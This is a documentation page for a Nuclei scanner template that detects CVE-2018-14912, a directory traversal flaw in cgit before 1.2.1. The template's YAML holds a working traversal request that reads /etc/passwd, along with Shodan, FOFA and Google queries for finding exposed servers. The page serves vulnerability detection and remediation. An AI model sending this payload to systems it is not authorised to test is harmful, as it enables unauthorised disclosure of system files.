Skip to content
Nuclei Templates

cgit < 1.2.1 - Directory Traversal

ID: CVE-2018-14912

Severity: high

Author: 0x_Akoko

Tags: cve,cve2018,cgit,lfi,cgit_project

Description

Section titled “Description”

cGit < 1.2.1 via cgit_clone_objects has a directory traversal vulnerability when enable-http-clone=1 is not turned off, as demonstrated by a cgit/cgit.cgi/git/objects/?path=../ request.

YAML Source

Section titled “YAML Source”
id: CVE-2018-14912


info:
  name: cgit < 1.2.1 - Directory Traversal
  author: 0x_Akoko
  severity: high
  description: cGit < 1.2.1 via cgit_clone_objects has a directory traversal vulnerability when `enable-http-clone=1` is not turned off, as demonstrated by a cgit/cgit.cgi/git/objects/?path=../ request.
  remediation: |
    Upgrade cgit to version 1.2.1 or later to mitigate the vulnerability.
  reference:
    - https://cxsecurity.com/issue/WLB-2018080034
    - https://nvd.nist.gov/vuln/detail/CVE-2018-14912
    - https://lists.zx2c4.com/pipermail/cgit/2018-August/004176.html
    - https://bugs.chromium.org/p/project-zero/issues/detail?id=1627
    - https://lists.debian.org/debian-lts-announce/2018/08/msg00005.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2018-14912
    cwe-id: CWE-22
    epss-score: 0.96192
    epss-percentile: 0.99513
    cpe: cpe:2.3:a:cgit_project:cgit:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: cgit_project
    product: cgit
    shodan-query: http.title:"git repository browser"
    fofa-query: title="git repository browser"
    google-query: intitle:"git repository browser"
  tags: cve,cve2018,cgit,lfi,cgit_project


http:
  - method: GET
    path:
      - "{{BaseURL}}/cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd"


    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"


      - type: status
        status:
          - 200
# digest: 490a004630440220409105c81f58c058ee1e41798774fb2ae931ce12d64ee169f9edecae747a18e70220390f386b27ef8acd9be8be59f45cad09fb63a44390ead94a2a4c853248858e30:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-14912.yaml"

View on Github